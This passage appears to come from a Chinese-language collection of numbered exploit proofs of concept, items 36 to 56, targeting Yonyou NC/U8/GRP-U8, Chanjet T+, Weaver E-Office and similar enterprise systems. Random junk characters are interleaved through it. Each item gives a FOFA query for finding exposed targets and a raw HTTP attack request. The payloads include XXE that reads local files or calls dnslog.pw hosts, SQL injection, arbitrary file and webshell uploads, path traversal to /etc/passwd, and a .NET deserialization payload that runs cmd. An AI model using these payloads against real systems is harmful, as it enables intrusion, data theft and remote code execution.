. a% s1 {7 ?3 Z tHost: 203.25.218.166:8888
9 r: N0 q3 z# v- N. P4 U! Q5 N4 q% MUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info7 T5 _2 e1 u% F/ L5 D( ]+ h
Accept-Encoding: gzip, deflate3 a" ~1 b8 Y: H# ?1 j$ B
Accept: */*6 ~1 Y! s ?7 j
Connection: close
. q' k" C0 |* ]accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
/ P+ p( _. j0 g6 c( ? C8 _Content-Length: 190+ ]8 S7 S+ u8 J8 V/ Z0 _% m
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0& } m; D/ i- R, t( ]; d- F
7 ]6 E/ D: d% a9 y
--fd28cb44e829ed1c197ec3bc71748df05 g6 g# m* t |
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"4 V5 h- ^' F3 R1 V) U! \) P
5 a& m, K6 X) P/ J<%out.println(1111*1111);%>
" @" K) \# i* e+ l4 O# f; C--fd28cb44e829ed1c197ec3bc71748df0--
1 M e6 {/ D: D. ]
9 e/ t; t$ X: z; [! ]% @' N( `0 @5 C) w
36. 用友NC-Cloud soapFormat XXE1 y: M4 k% ?5 X9 [$ \
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
& ^- e3 [# l6 e8 pPOST /uapws/soapFormat.ajax HTTP/1.1
7 N! X( C. ^% W, E7 lHost: 192.168.40.130:8989! C; Z& f$ P h8 [$ j6 P& K( A0 r/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.01 t/ C! d3 }( z7 v# l
Content-Length: 263
) |- b) d/ g( t" h' uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: K' \2 O/ c" v0 D5 e/ xAccept-Encoding: gzip, deflate* ]! b" {1 v2 d3 N7 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 i) L% {# ]/ x( e* g: Q# J, jConnection: close
" I, @" l6 J6 V2 w7 AContent-Type: application/x-www-form-urlencoded
* U- G# M% B; V# J) ^Upgrade-Insecure-Requests: 1% o+ a! n3 l4 A+ T1 l5 l0 m
# E- s: _/ ]5 D9 [8 o. [
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a$ a# S9 G/ m3 O0 q
6 S* }/ A9 d1 D( T
5 [: }; b" c* Q
37. 用友NC-Cloud IUpdateService XXE$ F- F# P, N) ^' P: t
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ \2 p: K d3 q8 ~& B% k5 f$ A& Z
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1! P3 [6 e# u6 X# w+ T( u
Host: 192.168.40.130:89892 m/ ?, B1 P, E7 ?" A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
V- }6 L0 Z) nContent-Length: 4217 w" |; x$ b4 d! e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( w* J* v1 F+ V* O1 q# U1 F* T* NAccept-Encoding: gzip, deflate
; M# F- L8 Q) c1 R7 W3 rAccept-Language: zh-CN,zh;q=0.9; ]$ i& H, I! U4 U% B
Connection: close
! F# f3 v' h6 NContent-Type: text/xml;charset=UTF-8
) O$ a9 U w5 h$ x* DSOAPAction: urn:getResult
; W% ^8 d0 @& {/ P/ Y, zUpgrade-Insecure-Requests: 17 I' ?, i" l5 p1 t' F' O$ A0 b
7 v0 P6 M' ]) L) ^3 M# N/ |+ p
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
( X# r7 R+ c2 O) I' S( l' ]<soapenv:Header/>
5 k% T F8 t, g* E4 C6 {' W<soapenv:Body>- I2 ]0 ~. j8 J; `3 Z, U. d3 K2 c
<iup:getResult>% F+ e) E3 S# g; V% _% [9 ~
<!--type: string-->
6 R% N) x- T T# s9 K! L: e' O<iup:string><![CDATA[
& J- C! A$ L6 A1 Q. P<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
0 {( ^& c, h5 J- |6 G+ G+ i. v<xxx/>]]></iup:string>5 N: {. _6 s/ H4 n! h
</iup:getResult>+ o8 M9 y+ _( T, ~7 [
</soapenv:Body>
; x# x g& `2 `- b* Z5 V: R</soapenv:Envelope>+ e6 ^; X; U. k7 g b7 u1 m" b- B
* C+ G9 T! a9 V, } R0 k. [3 k: x0 b
; H8 m/ v6 U J
; [) G# x& q; B5 y
38. 用友U8 Cloud smartweb2.RPC.d XXE
1 c- m* Z3 M, f; s% sFOFA:app="用友-U8-Cloud"5 Y, J; a& `% @6 e
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
( z* K1 D0 L# p8 f; j8 ]8 lHost: 192.168.40.131:80889 l% B. O% }0 T! h! X# {4 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
; B$ X8 Y5 g9 B, N7 UContent-Length: 260) R$ R4 s8 w; |$ x, ]( q( Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
$ y0 c3 B. S; Z/ OAccept-Encoding: gzip, deflate6 A- n. l: W# ^; L
Accept-Language: zh-CN,zh;q=0.9
6 Q. y1 r0 d& O6 D6 E( CConnection: close
5 X. {; t2 ?/ W! f1 z" _1 `Content-Type: application/x-www-form-urlencoded V% r' v. f8 a v
: `' o+ `1 T6 s: D% G' o__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
6 V1 @7 v& `- O$ V t( q/ Y7 I) E) o) T3 \
0 ]7 j i3 c6 T3 n: \, N
39. 用友U8 Cloud RegisterServlet SQL注入" M" @1 ?- h/ [) W
FOFA:title="u8c"
* l: `$ N# n1 r' R0 N/ _( uPOST /servlet/RegisterServlet HTTP/1.1
( {$ s5 v/ A- F: P7 s iHost: 192.168.86.128:8089
8 Q! v- [; ?2 O8 S) ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 D- c+ S2 Q0 V* p
Connection: close2 U) q1 p! i! W$ i1 j9 [! C
Content-Length: 85
7 s6 Y2 H5 w5 y: \Accept: */*
. ]- y# w: z7 V8 yAccept-Language: en" c+ \3 S7 p* ]: J. s9 w7 @4 O, k
Content-Type: application/x-www-form-urlencoded
) ~' A' G0 t9 I" p8 [4 Z- j) P& WX-Forwarded-For: 127.0.0.1
+ @9 d& S1 w! i& |Accept-Encoding: gzip
; Z% T, T V& S# Y6 h0 s( U
$ O- R# T- j8 t( e, xusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--& c8 g: N6 a8 f6 E' a) H0 @, ]( x
7 V9 ]7 h7 g" j3 w& V2 q$ t
3 }; A2 n& u# F. F$ @, B
40. 用友U8-Cloud XChangeServlet XXE
* [: ]: [( L/ IFOFA:app="用友-U8-Cloud" P; N0 Y# \/ A/ U0 ?6 P
POST /service/XChangeServlet HTTP/1.1- m" g+ g+ }; \
Host: x.x.x.x# k3 o$ u' M& d
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& H$ B& Q1 i- F' s! b. k
Content-Type: text/xml3 ~ O1 i5 Z0 S& n, D
Connection: close
7 B; C8 j2 Z% o1 w& R8 [0 U6 v/ [) B- E9 @& |8 T8 o
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>, p7 e3 Y, x7 y
( D+ G |( ]7 Q: ^+ ^# t, s4 F- C9 [: {1 w! c* O
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 K1 [- X: [. v8 J6 z0 k+ J
FOFA:app="用友-U8-Cloud"0 H& b) Z$ k) {! r: K# _
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1/ v8 h. L% w( {7 G( i1 K/ N0 v* |
Host:
" Z1 ]5 ?" s" y) g. l& iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# N. m% u' c2 p* U' `& c) v
Content-Type: application/json( U9 H' H9 c* K B
Accept-Encoding: gzip3 }9 f- [; e3 ]. F" N `
Connection: close* y5 U2 O- {% _: `% q9 g
0 U1 |* C0 ?8 j% q1 {- \0 ?6 U9 X
' z3 M/ D$ \' m* q+ O42. 用友GRP-U8 SmartUpload01 文件上传. Z7 j& y. z5 d) A
FOFA:app="用友-GRP-U8"
5 O, M P/ j. V/ e/ u/ h) HPOST /u8qx/SmartUpload01.jsp HTTP/1.1
" d2 _. U( t! S/ p& a( RHost: x.x.x.x _, [& Q/ l; P, u* Q# @5 n: V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt5 M: I' _: ?0 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36& W/ _; q. `1 O8 p7 t+ M$ V* D2 O
- e; o3 M) {: l: }+ [) w
PAYLOAD0 I; x1 ~ T$ _4 @+ T- I
: m6 ^: h p) X7 y( C
6 _9 g9 A/ @& H: \http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml) ^1 `* Y; U9 N2 R6 r
& x& t2 ~# A" h1 J
43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 q) ^( C( i) ?- a5 P/ }
FOFA:app="用友-GRP-U8"7 R+ d2 I2 z5 W) @$ m5 c9 B8 C
POST /services/userInfoWeb HTTP/1.1
Z6 b1 A% [9 V4 w" n4 _Host: your-ip0 D! G! e( s, r, X) f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
7 Y9 ~- `5 ?7 |% Q0 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! t+ y6 u. g6 w$ R
Accept-Encoding: gzip, deflate
2 ]: b b1 c6 E5 }# vAccept-Language: zh-CN,zh;q=0.9$ V! i! F3 q$ V# l# w
Connection: close1 G: l8 m0 g" @1 A8 M3 \. [
SOAPAction:, ~, ]3 O- J8 S7 ?, T; w Q
Content-Type: text/xml;charset=UTF-8+ _' x, L ~ x9 {1 m& U/ P
5 [2 V6 j5 J) J/ K0 T9 G- c
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
$ s/ [2 U- |1 {5 q <soapenv:Header/>) j# E6 U9 w% D6 L
<soapenv:Body>
4 ` o# |. A* [, X8 f8 L <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">- A2 v2 b; m3 @! z2 {: z w
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( R$ R5 \4 A; i2 t- P
</ser:getUserNameById>/ O; q' u, }* F% Q9 Q0 W! t; C
</soapenv:Body>1 M; V. a1 F8 S# f
</soapenv:Envelope>1 R' e/ c Q& r' z
4 |5 s5 i% v# [% @, i2 ^+ O# A, C. a9 O+ D8 e# A; S
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
" A, y- A' ?0 r: x9 XFOFA:app="用友-GRP-U8", s6 N/ a( B8 r3 n$ \- }2 j
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, r; s) ^" b, ]1 i
Host: your-ip) U# D$ Z9 d, I7 \/ T1 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
* b6 M. D2 s" p/ S/ I7 i J; j0 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' G6 J; J+ ]9 E2 S U
Accept-Encoding: gzip, deflate
9 \$ O* H$ G1 I3 }2 u+ CAccept-Language: zh-CN,zh;q=0.9
. T1 F% h! t- MConnection: close5 \7 z: [0 S3 i; a' [
. {( `0 |! f2 g/ Q: l2 Q: [- ^/ Z+ a6 L! r
45. 用友GRP-U8 ufgovbank XXE
( B' f6 e9 w* I sFOFA:app="用友-GRP-U8"
M" T. U: r1 E# c4 i: ~/ a% x) cPOST /ufgovbank HTTP/1.12 e. R6 ?! Y0 B7 ?& H; u; I, g
Host: 192.168.40.130:222
1 z) T8 `4 U T- mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
- s! W4 t; E" ?. J L6 HConnection: close. P- j, @% j9 [ e/ i
Content-Length: 161
6 r& j6 A! b5 x8 t+ V" h: |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& B* U4 O$ G# U' X a& [% mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 z" @" F4 X/ G+ T% ]8 QContent-Type: application/x-www-form-urlencoded
; I; U: I9 D7 D9 rAccept-Encoding: gzip, Y) H3 q: T: u( Q
; k' f# J& z! g J# Y& R8 wreqData=<?xml version="1.0"?>
/ f- m. p6 D0 Z0 X% `+ b2 n/ @! j<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
! M" S' c8 N4 X8 `3 A: a6 K; u+ ]! t2 l3 l
8 q, }5 @' l2 B% `1 B: P8 @46. 用友GRP-U8 sqcxIndex.jsp SQL注入* t: x& H+ r8 o% [; P1 _+ c6 B
FOFA:app="用友-GRP-U8"
2 ?8 k- P+ K5 S4 Y. }# _GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
& Y! E% T" m F. FHost: your-ip
' L! Q2 q/ g, W8 a6 J$ l. ]( pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" y& K5 A. T/ k+ ~5 f- ~% e$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 j7 Y; m4 w; U0 g
Accept-Encoding: gzip, deflate
/ M, s2 \: v: y- ZAccept-Language: zh-CN,zh;q=0.9
9 O5 M% R- c: eConnection: close
& L. q; v( p5 m, y
6 u& O% x6 z* Q9 Y$ G {) E
* f6 k8 A) Q3 K1 k" d$ Y47. 用友GRP A++Cloud 政府财务云 任意文件读取
) }; f4 S# Y, v/ _# v0 O' MFOFA:body="/pf/portal/login/css/fonts/style.css"3 E3 s) O1 z0 x" G( H1 ]( [2 B
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1+ ], S' X( h: i) v
Host: x.x.x.x
* e q8 o% c* t& g5 s4 ZCache-Control: max-age=0
/ B: u0 @" w4 d0 R# C9 s& k( eUpgrade-Insecure-Requests: 1! J: b7 X- u1 w" V \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, Z3 H- ]0 ^$ K0 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 w9 n* C3 S. P$ j5 e, T0 O+ M5 V' DAccept-Encoding: gzip, deflate, br
* o, L, m5 F3 R. S7 [8 b2 i' jAccept-Language: zh-CN,zh;q=0.9
8 u; ]) F7 R3 mIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
" O9 p: J" v! WConnection: close
3 }, }# V7 Z! J+ s& E/ U+ O! t' M! d
" R7 D0 y1 z/ x0 U1 v; R/ y& I# A8 Z+ Y4 D
48. 用友U8 CRM swfupload 任意文件上传# n! C: R- c4 l& u; X% e6 }0 b
FOFA:title="用友U8CRM"5 L! S# I5 h1 _/ }. q: p
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
& C0 O. T3 t; z' i9 z% @Host: your-ip
! y4 Z5 ^8 C1 I4 Q" r. Q* S* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ {. M/ l* f" Z; ]) t# a. u8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* d4 k- ?+ t% m: QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; n0 Z: G8 e1 `7 V4 X
Accept-Encoding: gzip, deflate( M) q: O& h4 T c
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855" _, H, p l; g7 l; p
------269520967239406871642430066855
( H k4 h, {0 t/ p0 ^' _4 [% V) r9 IContent-Disposition: form-data; name="file"; filename="s.php"9 i# z4 ^" ?2 V7 l: L
1231: ]7 r- a3 D4 E4 f! [; g3 M, e5 T
Content-Type: application/octet-stream
3 J& X0 @2 o7 H/ b/ D------269520967239406871642430066855
/ N' z* i2 o4 ^Content-Disposition: form-data; name="upload"
3 k8 l) k4 x3 _ C* Bupload' s4 Q# c# I2 y: _4 r
------269520967239406871642430066855--
7 N1 e2 j6 G5 M3 ]' x1 X. q: U9 w
: D r* U: I; i% `- h; Z' d$ t9 Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传' N0 ^/ s( e7 V" g
FOFA:body="用友U8CRM"
( g( p# V& W& k3 D9 S) Q7 r( D J" _" j6 t
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
- x: m3 ]' [- W- _5 ? [: S5 qHost: x.x.x.x
. N+ O( b& B0 {. KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! [6 r9 W' ~! \5 h6 s) iContent-Length: 329- p! F2 [3 X! K3 M* X1 k" L) [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 Y. ~, J, E) ?- T
Accept-Encoding: gzip, deflate! ?% Y% a9 _ f( |5 `" f; \$ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
} n+ M. b* v9 I+ i- |% hConnection: close' {4 K# i, ~+ V* `8 ?/ K: Y
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
7 x$ q' |( P/ |9 q9 F4 D
" h* d/ ?, p8 X: _+ _-----------------------------vvv3wdayqv3yppdxvn3w
( I/ A5 b+ `; i' E9 [! WContent-Disposition: form-data; name="file"; filename="%s.php "% q" ?- u% V ^6 y# C
Content-Type: application/octet-stream
4 \6 c( r6 p2 g4 t3 ^. ?& |& Z0 ~! r
wersqqmlumloqa3 l3 _# G5 F( d# {, `7 J, i/ g
-----------------------------vvv3wdayqv3yppdxvn3w# B1 ]' e8 l% A6 ~8 ]! a6 P
Content-Disposition: form-data; name="upload"/ { y3 A0 S% k- K4 V7 K
' c9 i3 e3 h8 D* H, f/ y0 S
upload% R0 r2 p6 e( ]& i% E; W8 g
-----------------------------vvv3wdayqv3yppdxvn3w--6 i& X8 ~# W! q7 b4 A
6 q7 g) g9 M, r# o: }
' C$ U5 g, h- {/ f, Phttp://x.x.x.x/tmpfile/updB3CB.tmp.php9 e* P0 f& k) j6 i
1 m2 d+ G( n) U* |50. QDocs Smart School 6.4.1 filterRecords SQL注入
( P; Y7 S" P4 F" f E" @FOFA:body="close closebtnmodal"
. W: m( \" m5 B, }0 ~( TPOST /course/filterRecords/ HTTP/1.1
$ p9 R9 x1 I D4 }! OHost: x.x.x.x
% M/ n) `! Y u. \& M3 p" b& @, BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! H3 [, l9 t" P8 C8 @8 s4 TConnection: close2 ^( }4 b! M4 E
Content-Length: 224- M. y& r" Z4 x R# k+ h1 V4 r
Accept: */*
; E4 T6 J, }$ ]6 j0 e, `2 ]Accept-Language: en
4 c* x. Y8 A$ v4 n! N# {Content-Type: application/x-www-form-urlencoded1 ~- }# ?7 D2 u4 J# y) s, }; n+ ]
Accept-Encoding: gzip
2 q/ W& }* I8 R3 s
d0 D, x9 p% n- X9 k, O8 Lsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
" i. P$ J6 t9 G5 @0 ~8 J) X l7 t4 d* c$ }/ b% z
& r/ X9 B% i6 R% t* f% ~. w51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入: b" C; v- c. p9 q/ r$ m" F( k
FOFA:app="云时空社会化商业ERP系统"
2 \$ d. s( V' cGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1* R e' P7 Y2 }4 z+ H
Host: your-ip
# o# W8 o6 `1 b2 D! }8 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
% w) Z }* k4 A) v+ k }9 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 ~& V$ ~" U# o' q. U; N
Accept-Encoding: gzip, deflate( B& D3 ~2 s, {8 H8 H* {- w
Accept-Language: zh-CN,zh;q=0.9; D" N5 G( w* Z& I. o9 X
Connection: close
7 G; x" ]/ [9 C) C' ?# a; T" N
, M; c$ H1 C u/ ~
: B" _6 x2 u+ O- ~% _9 |) J52. 泛微E-Office json_common.php sql注入
% n a2 f& Y& e* AFOFA:app="泛微-EOffice" M' s& h; b% g+ D' L
POST /building/json_common.php HTTP/1.1
( @- o/ G4 s' ?) AHost: 192.168.86.128:8097
! @' m. X: W' M5 P( W/ B* E+ MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: z' N- S$ Q1 }+ D) y0 `Connection: close
/ G/ L9 D5 D0 a9 M& M- pContent-Length: 87
; H P/ C M& O( y6 dAccept: */*
4 e- f" {8 g ]8 A# P$ u, aAccept-Language: en" T5 T6 D; p/ D9 H2 Z0 a/ `
Content-Type: application/x-www-form-urlencoded+ x+ q/ u" |/ P$ m; N( M! ]9 L4 B
Accept-Encoding: gzip, ^; h5 I/ v2 D) {6 w s
2 p$ w5 p7 u+ D" P3 [
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333+ a8 b0 X% r4 p# T2 d
( f4 y( Z+ G1 \1 P" J4 w
$ ]# o3 Q7 U" N5 } e( Z4 g2 W, Q53. 迪普 DPTech VPN Service 任意文件上传
* p. G) P* d. x8 U7 \8 XFOFA:app="DPtech-SSLVPN"
% o& l# m! ]# f7 M/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd7 X. e: A! r. n5 a5 a( ?
. u( E; \9 Y- F& `: ~2 Y6 A4 \7 G' O0 i2 e4 j$ j* i* e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' Q4 ~7 e- j# M' {FOFA:app="畅捷通-TPlus"8 D4 j' j0 j% z1 I
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件1 M: r) x) K$ f; A7 q. _
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt", }# I! z, ] A
% U/ D& A8 H8 [. a9 f3 z
3 q0 g% c- ?* F- `1 Y# n0 [( Y完整数据包: Y* V' n# ~6 I1 r- t% b
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
6 K3 s& k1 k' RHost: x.x.x.x
* c8 t$ H+ q+ e" T2 o, ]User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 C' I7 B2 G; t w$ t' s. o- D
Content-Length: 593
' c8 V) U) J* s0 N: \ Q: Z% h1 `" N: @9 Q: {5 f: }
{
. m4 S6 F4 ~. M: \0 j, |"storeID":{
7 C9 g7 p" C6 _$ o "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",9 r' s8 m" p+ V% X. Y
"MethodName":"Start",' E$ w+ A5 u3 \5 C1 G
"ObjectInstance":{
, h h3 [3 z3 D. @! v6 @6 r "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 Y! t+ z" c# r; L* u: O
"StartInfo":{
& k: M" l' T6 q% x0 V "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 N7 J) F$ O9 X/ ]: f ?# \9 I/ g
"FileName":"cmd",
) P5 |2 _. S) U& [& T' Z "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"# t) k( A* R; s, x4 i9 V
}7 b% z; |) R7 I! t$ `4 }
}% Q" n9 U& |) g& Y b" h
}
% N3 [0 R/ p9 ^* |# Y! n: O}
* ?$ i7 K8 |2 a1 ]
, I5 g" U/ E* f9 z5 _
8 c- O/ E& O: w% T! R: u3 d第二步,访问如下url
) {3 U% O' f6 b+ c( Z6 [, b0 ~$ F/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
" X$ Q5 f* h# `7 v1 Q# b A" Z' e' m- U" k# P
5 c$ q- y* O Y# ~* N8 [55. 畅捷通T+ getdecallusers信息泄露
0 u5 ?$ l+ O; Z. O) U o) U- i0 yFOFA:app="畅捷通-TPlus"
" {1 d8 k& g" ?& y第一步,通过' q# l1 [. g9 ]% ^" ]
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
2 [, f; S4 r; X+ M7 v* V" ]$ ?第二步,利用获取到的Cookie请求
7 P7 n% E Z( q# Q3 B& d8 w/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
6 L! S3 [0 M9 i* Z
4 l1 t7 h0 t: T% F3 ?1 l3 f9 |56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
1 J9 C; m D! M& Q- \- q- |- oFOFA: app="畅捷通-TPlus"% X2 Z% s& p1 B# s# `3 E- M4 G
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1' j- C* C" A, Z/ _3 j+ `! \
Host: x.x.x.x) u! E/ D) P. Z7 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
